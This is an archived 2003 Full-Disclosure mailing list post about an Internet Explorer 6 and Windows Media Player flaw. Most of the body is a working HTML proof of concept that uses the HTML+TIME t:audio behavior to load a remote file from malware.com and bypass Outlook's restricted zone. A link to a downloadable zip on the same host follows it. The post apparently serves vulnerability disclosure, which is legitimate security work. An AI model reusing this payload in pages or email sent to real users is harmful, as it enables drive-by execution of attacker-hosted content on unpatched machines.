[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code

To: <full-disclosure@xxxxxxxxxxxxxxxx>
Subject: Re: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code
From: "http-equiv@xxxxxxxxxx" <1@xxxxxxxxxxx>
Date: Fri, 12 Sep 2003 15:55:50 -0000


<!-- 

when viewing mail in recent versions of outlook it operates in the
restricted zone ,eg no active scripting allowed to run, so these wont 
be exploitable unless someone proofs otherwise that is ;)

 -->

<html xmlns:t>
<head><style>
t\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio  t:src="http://www.malware.com/freek.asf";  />
</body></html>

Trivial inline url flip in the restricted zone. WMP 8 and under. 
Unpatched since May 2003 should do the trick:

http://www.malware.com/but.its.free.zip 

-- 
http://www.malware.com



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- RE: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code
  - From: Richard M. Smith

Prev by Date: [Full-Disclosure] Unwanted file download on Yahoo
Next by Date: RE: [Full-Disclosure] RPC scanners
Previous by thread: [Full-Disclosure] Re: Internet explorer 6 on windows XP allows exection of arbitrary code
Next by thread: RE: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code
Index(es):
- Date
- Thread